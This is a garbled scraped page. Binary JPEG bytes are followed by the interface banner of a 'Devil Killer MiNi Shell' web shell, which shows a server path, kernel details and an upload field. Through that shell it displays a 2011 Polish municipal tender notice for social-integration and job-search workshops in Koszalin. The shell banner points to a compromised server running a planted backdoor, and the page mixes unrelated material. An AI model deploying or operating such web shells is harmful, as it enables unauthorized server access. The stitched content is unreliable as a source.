JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110526/148961-N-2011.html

<p class="kh_header"><b>Koszalin: Przeprowadzenie warsztatów w ramach Klubu Integracji Społecznej dla uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 148961 - 2011; data zamieszczenia: 26.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , Al. Monte Cassino 2, 75-412 Koszalin, woj. zachodniopomorskie, tel. 094 3160300, faks 0-94 3160328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów w ramach Klubu Integracji Społecznej dla uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie warsztatów w ramach Klubu Integracji Społecznej dla uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego:
Zadanie I - Warsztaty Start na start:
Etap 1  - Warsztaty - Trening Komunikacji Interpersonalnej: 240 godzin;
Etap 2 - Warsztaty aktywnego poszukiwania pracy, w tym warsztaty kultury zawodu: 228 godzin;
Etap 3 - Warsztaty Edukacji Finansowej: 210 godzin.
Szczegółowy opis przedmiotu zamówienia dla Zadania I: Warsztaty START na start
ETAP 1 - Trening Komunikacji Interpersonalnej :
Poddziałanie 7.1.1 ( Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej -  do 45 osób)
Poddziałanie 7.1.2 ( Osoby nieaktywne zawodowo, uczące się, realizujące Indywidualny Plan Usamodzielnienia, w wieku 18 - 25 lat - do 10 osób)
 Poddziałanie 7.1.2 (Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, posiadające orzeczenie o stopniu niepełnosprawności - do 24 osób)	
Cel:
- Sztuka prezentacji siebie - Autoprezentacja
- Uwrażliwienie na innych - Doskonalenie kontaktu i słuchania
- Motywowanie i wywieranie wpływu poprzez Język ciała - komunikacja niewerbalna
- Świadomość siebie, innych w procesie komunikacji interpersonalnej
Tematyka zakres warsztatów:
- Autoprezentacja - sztuka prezentacji siebie, grupy, produktu, usługi...
- Skuteczność komunikacji interpersonalnej 
- Techniki budowania i utrzymywania kontaktu
- Systemy reprezentacji (wzrokowy, słuchowy i kinestetyczny)
- Język ciała: tonacja głosu, mimika i gesty
- Komunikaty Ja - skuteczne narzędzie porozumienia
- Komunikacja bez przemocy wg Rosenberga- jak zachęcić innych do empatii?
- Ekspresja emocji: energia ciała i precyzja słowa - komunikacja nie tylko werbalna
- Kwadrat komunikacyjny Shulza von Thuna
- Sztuka negocjacji i kompromisu
- Metakomunikacja
- Bariery komunikacyjne wg. Gordona
 -Aktywne słuchanie
- Parafrazowanie - komunikacja ze zrozumieniem
- Sztuka zadawania pytań: otwarte czy zamknięte?
- Informacja zwrotna w komunikacji interpersonalnej

Informacja dotycząca łącznie 3 poddziałań z Zadania I - Etap 1

Liczba grup - 6 (od 10 do 14 osób w grupie) 
Liczba godzin - 40 h grupę - (8 dni x 5 godzin dziennie)
Łączna liczba godzin - 240
Łącznie do 79 osób.

ETAP 2 -  Warsztaty Aktywnego Poszukiwania Pracy, w tym Warsztaty Kultury Zawodu:
Poddziałanie 7.1.1 ( Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej -  do 45 osób)
Poddziałanie 7.1.2 ( Osoby nieaktywne zawodowo, uczące się, realizujące Indywidualny Plan Usamodzielnienia, w wieku 18 - 25 lat - do 10 osób)
 Poddziałanie 7.1.2 (Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, posiadające orzeczenie o stopniu niepełnosprawności - do 24 osób).
Cel: 	
zapoznanie się z sytuacją na rynku pracy, wymogami pracodawców wobec potencjalnych pracowników. Podczas zajęć każdy z uczestników będzie mógł przeanalizować swoją indywidualną sytuację zawodową i przygotować się do skuteczniejszego działania w powrocie na rynek pracy i zakresie poszukiwania pracy oraz otrzymać indywidualną poradę od specjalisty - wizażysty.
Tematyka zakres warsztatów:
- samopoznanie (świadomość własnych zalet i wad, sukcesów i porażek, określenie własnych potrzeb, sprecyzowanie zainteresowań, podnoszenie własnej wartości);
- autoprezentacja zawodowa;
- problematyka rynku pracy (określenie wartości płynących z podjęcia pracy, przedstawienie metod poruszania się po rynku pracy, znajdowanie ofert pracy),
- dokumenty aplikacyjne,
- rozmowa kwalifikacyjna i proces rekrutacji (ćwiczenia symulujące, najczęściej zadawane pytanie, błędy popełniane przez kandydata w trakcie spotkania z pracodawcą, zasady doboru zawodowego, przestawienie testów),
- elementy kultury zawodu (zasady etykiety w miejscu pracy, zasady obsługi klienta i współpracy zespołowej, 
- możliwość uzyskania porad wizażysty w zakresie dbałości i ewentualnej zmiany wizerunku pod kątem poszukiwania zatrudnienia

Informacja dotycząca łącznie 3 poddziałań z Zadania I - Etap 2

Liczba grup - 6 (od 10 do 14 osób w grupie)
30 h grupę (5 dni x 6 godzin dziennie) i 8 h grupę
48 godzin (6 dni x 8 godzin dziennie) - doradztwo wizażysty (grupowe)
Łącznie 228 godzin.
Łącznie do 79 osób.

ETAP 3 - Edukacja Finansowa:

Poddziałanie 7.1.1 ( Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej -  do 45 osób)
Poddziałanie 7.1.2 ( Osoby nieaktywne zawodowo, uczące się, realizujące Indywidualny Plan Usamodzielnienia, w wieku 18 - 25 lat - do 10 osób)
 Poddziałanie 7.1.2 (Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, posiadające orzeczenie o stopniu niepełnosprawności - do 24 osób)

Cel:
Szerzenie wiedzy, rozwijanie umiejętności i wykształcenie pozytywnych nawyków potrzebnych do umiejętnego zarządzania pieniądzem przy uwzględnieniu celów wyznaczanych na przyszłość.
Nabycie wiedzy w zakresie pozyskiwania środków na założenie własnej działalności, elementy biznesplanu, zasad pozyskiwania dotacji.
Tematyka zakres warsztatów:
- analiza budżetu i celów finansowych gospodarstwa domowego;
- sposoby i możliwości oszczędzania;
- zasady racjonalnego pożyczania;
- tworzenie domowego planu finansowego;
- zarządzanie domowym zadłużeniem;
- możliwości zdobywania środków na zakładanie działalności gospodarczej,
- elementy tworzenia biznesplanu i kosztorysów,
- podstawy zakładania działalności gospodarczej.

Informacja dotycząca łącznie 3 poddziałań z Zadania I - Etap 3
Liczba grup - 6 (od 10 do 14 osób w grupie)
35 h grupę (7 dni x 5 godzin dziennie)
Łącznie 210 godzin.
Łącznie do 79 osób

Zadanie II - Warsztaty w Programie Aktywności Lokalnej:
Etap 1 - Warsztaty  kreatywności i komunikacji I tura: 50 godzin;
Etap 2 - Warsztaty Budowanie przywództwa stawanie się motywującym liderem
z zasadami realizowania i  planowania animacji lokalnej, z elementami coachingu: 50 godzin.
Etap 3 - Warsztaty  kreatywności i komunikacji II tura: 50 godzin.

Szczegółowy opis przedmiotu zamówienia dla zadania II - Warsztaty  w Programie Aktywności Lokalnej:

Etap 1: Warsztaty  kreatywności i komunikacji I tura 

Poddziałanie 7.1.1 (Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej - do 15 osób).
	
Cel: 
- nabycie umiejętności komunikacji interpersonalnej
- nabycie umiejętności  współpracy w grupie
- nabycie umiejętności twórczego myślenia
Tematyka zakres warsztatów:
- zasady skutecznego porozumiewania się - model procesu komunikowania, korzyści ze skutecznego komunikowania
- znaczenie komunikacji werbalnej i niewerbalnej
- kontakt niewerbalny - mowa ciała, kontakt wzrokowy, przestrzeń międzyludzka, bariery w komunikowaniu niewerbalnym
- aktywne słuchanie
- rozwijanie kreatywności poprzez twórcze myślenie, cechy osoby twórczej, bariery blokujące twórcze myślenie, 
- techniki kreatywności i kształtowanie osobowości kreatywnej

Liczba grup - 2 (7 - 8 osób w grupie)
25 godzin/grupę (5 dni x 5 godzin dziennie)
Łącznie 50 godzin.
Łącznie do 15 osób

Etap 2 - Warsztaty Budowanie przywództwa stawanie się motywującym liderem
z zasadami realizowania i  planowania animacji lokalnej, z elementami coachingu

Poddziałanie 7.1.1 - (Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej - do 15 osób)

Cel: 
- nabycie wzmocnienie umiejętności sprawnego kierowania zespołem 
- nabycie wzmocnienie umiejętności współpracy w grupie
- wyłonienie Grupy Liderów Lokalnych (min. 3 osoby) spośród uczestników PAL
Tematyka zakres warsztatów:
- przywództwo, rola lidera, cechy osobowościowe kształtujące lidera, autorytet, etyczne przywództwo
- umiejętność współdziałania z ludźmi
- diagnoza osobowości przywódcy lidera
- psychologiczne aspekty wizerunku lidera (budowanie wizerunku lidera, metody pozytywnej autoprezentacji)
- psychologiczne predyspozycje przywódcy (umiejętność wpływania na postawy i przekonania, skuteczne realizowanie zadań), 
- radzenie sobie z sytuacjami konfliktowymi w grupie
- skuteczne motywowanie

Liczba grup - 1 (do 15 osób w grupie)
50 godzin / grupę ( 10 dni x 5 godzin dziennie)
Łącznie 50 godzin.
Łącznie do 15 osób

Etap 3 -  Warsztaty  kreatywności i komunikacji II tura

Poddziałanie 7.1.1 (Osoby bezrobotne lub nieaktywne zawodowo, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej - do 15 osób).

Cel: 
- wzmocnienie umiejętności komunikacji interpersonalnej i radzenia sobie w trudnych sytuacjach
-  wzmocnienie umiejętności  współpracy w grupie
- wzmocnienie umiejętności twórczego myślenia
- nabycie umiejętności kreatywnego rozwiązywania sytuacji problemowych konfliktów
Tematyka zakres warsztatów:
- sposoby reagowania w sytuacji konfliktowej i stresującej
- wyrażanie prośby, asertywna odmowa, asertywne wyrażanie i przyjmowanie krytyki
- asertywność i radzenie sobie w sytuacjach trudnych
- trening umiejętności negocjacji w oparciu o wzorce asertywne
- strategie 
- kreatywność w pracy zespołowej

Liczba grup - 2 (7 - 8 osób w grupie)
25 godzin grupę (5 dni x 5 godzin dziennie)
Łącznie 50 godzin. Łącznie do 15 osób.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek 1 - posiadanie uprawnień do wykonywania określonej działalności lub czynności zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1 lit a SIWZ, oraz dołączy do oferty wpis do Rejestru Instytucji Szkoleniowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek 2 - posiadania wiedzy i doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1 lit b SIWZ oraz dołączy do oferty wykaz wykonanych usług, z którego będzie wynikało, iż zrealizował w okresie ostatnich trzech lat (lub krótszym) minimum 1  usługę w formie zajęć warsztatowych, w zakresie realizacji celów: wzmocnienie kondycji psychozawodowej i lub poprawy relacji rodzinnych i środowiskowych i lub podniesienia umiejętności społecznych i zawodowych odbiorców usług i lub budowanie przywództwa stawanie się motywującym liderem z zasadami realizowania i  planowania animacji lokalnej z elementami coachingu lub równoważnych, w formie zajęć warsztatowych, 
w wymaganej minimalnej ilości 85 godzin dla 1 grupy liczącej min. 10 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek 3 - dysponowania odpowiednim potencjałem technicznym zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 10 ppkt 1 lit c SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek 3 - dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie,o którym mowa w pkt 10 ppkt 1 lit c SIWZ oraz dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego będzie wynikało, że Wykonawca dysponuje:

co najmniej dwiema osobami ( dla Zadania I), które posiadają wykształcenie wyższe i posiadają doświadczenie polegające na przeprowadzeniu  grupowych zajęć psychospołecznych, w których łącznie wzięło udział co najmniej 30 osób;

co najmniej jedną osobą ( dla Zadania II), które posiadają wykształcenie wyższe 
i posiadają doświadczenie polegające na przeprowadzeniu  grupowych zajęć psychospołecznych, w których łącznie wzięło udział co najmniej 30 osób;

co najmniej jedną osobą ( dla Zadania I), która posiada wykształcenie wyższe i posiada uprawnienia  Doradcy Zawodowego oraz posiada doświadczenie polegające na przeprowadzeniu grupowych warsztatów aktywnego poszukiwania pracy i kultury zawodu lub równoważnych w zakresie aktywizacji zawodowej, w których wzięło udział, co najmniej 30 osób;

co najmniej jedną osobę ( dla Zadania I), która posiada wykształcenie średnie i posiada uprawnienia  Wizażysty Stylisty Doradcy wizerunku lub równoważne oraz posiada doświadczenie polegające na doradztwie grupowym ,lub indywidualnym  w ww zakresie;

co najmniej jedną osobą ( dla Zadania I), która posiada wykształcenie wyższe 
i  doświadczenie polegające na przeprowadzeniu grupowych warsztatów dotyczących edukacji finansowej lub równoważnych w zakresie gospodarowania budżetem domowym i zadłużeniem , w których wzięło udział, co najmniej 30 osób;

co najmniej jedną osobą ( dla Zadania II), która posiada wykształcenie wyższe 
i doświadczenie polegające na przeprowadzeniu grupowych warsztatów dotyczących budowanie przywództwa stawanie się motywującym liderem z zasadami realizowania i  planowania animacji lokalnej, z elementami coachingu.

Do wyżej wymienionych osób wymagane jest oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek 4 - sytuacji ekonomicznej i finansowej zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku, o którym mowa w pkt 10 ppkt 1 lit d SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2Ofertę może złożyć tylko podmiot do tego uprawniony, w tym celu należy dołączyć do oferty dokument lub dokumenty, z których wynika uprawnienie do podpisania oferty i dokumentów złożonych wraz z ofertą.
W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, pełnomocnictwo określające jego zakres winno być złożone wraz z ofertą, (o ile nie wynika to z innych dokumentów załączonych do oferty np. z odpisu z rejestru handlowego, zaświadczenia o wpisie do ewidencji działalności gospodarczej) i podpisane przez osoby uprawnione do reprezentowania wykonawcy. Pełnomocnictwo należy złożyć w oryginale lub kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem ( czytelny podpis lub podpis opatrzony imienną pieczęcią oraz adnotacją za zgodność z oryginałem).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 ustawy - Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.). 
Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
Zmiany rzutujące na wynagrodzenie.
Możliwa jest zmiana postanowień umowy w związku ze zmianą:
- narzuceniem obciążeń publiczno - prawnych, których nie można było przewidzieć w chwili zawierania umowy,
Zmiany rzutujące na termin realizacji:
Możliwa jest zmiana terminu realizacji zamówienia z przyczyn niezależnych od Wykonawcy (przedłużająca się procedura przetargowa, kataklizmy i siła wyższa, strajki itp., jeżeli mają wpływ na wykonanie zadania).
Określa się następujący tryb dokonywania zmian postanowień umowy:
- Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany;
- Zamawiający wnioskuje, aby Wykonawca przedłożył propozycję zmiany;

Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy itp).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP: mops.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Koszalinie przy Al. Monte Cassino 2 pok. 07.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2011 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Społecznej, Al. Monte Cassino 2 
75-412 Koszalin
Pokój nr 20- kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Koszaliński Program Integracji Społecznej - START, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
